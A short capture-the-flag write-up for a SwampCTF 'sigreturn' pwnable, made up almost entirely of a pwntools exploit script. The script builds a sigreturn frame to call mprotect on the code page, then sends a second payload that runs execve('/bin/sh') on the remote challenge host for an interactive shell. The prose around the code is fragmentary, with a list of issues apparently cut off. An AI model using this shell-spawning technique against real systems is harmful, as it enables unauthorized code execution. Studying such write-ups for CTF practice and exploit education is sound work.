Tags: sigreturn pwnable
Rating: 3.0
This is similar to Backdoor 2017 challenge funsignals. reading user input to stack and excute syscalls. except:
To resolve above issues, we need multiple syscalls.
from pwn import *
p = remote('chal1.swampctf.com',1800)
context.arch='amd64'
#Sigreturn frame for SYS_mprotect
frame = SigreturnFrame()
frame.rax = 10 # SYS_mprotect
frame.rdi = 0x400000 # addr
frame.rsi = 0x1000 # len
frame.rdx = 7 # proto
frame.rsp = 0x400400 # point new rsp after the code section
frame.rip = 0x400104 # to the 1st syscall instruction, so we can then read second payload on new stack and execute.
# syscall (rax = SYS_rt_sigreturn)
payload1 = p64(0)*3+p64(15)+p64(0)*4+str(frame)
# syscall (rax = SYS_execve, rsi = rdx = 0, rdi = addr of '/bin/sh' (placed just after the register values)
payload2 = p64(0)*3+p64(59)+p64(0)*3+p64(0x400440)+'/bin/sh\0'
print p.recvline().strip()
p.sendline(payload1)
p.sendline(payload2)
p.interactive()
p.close()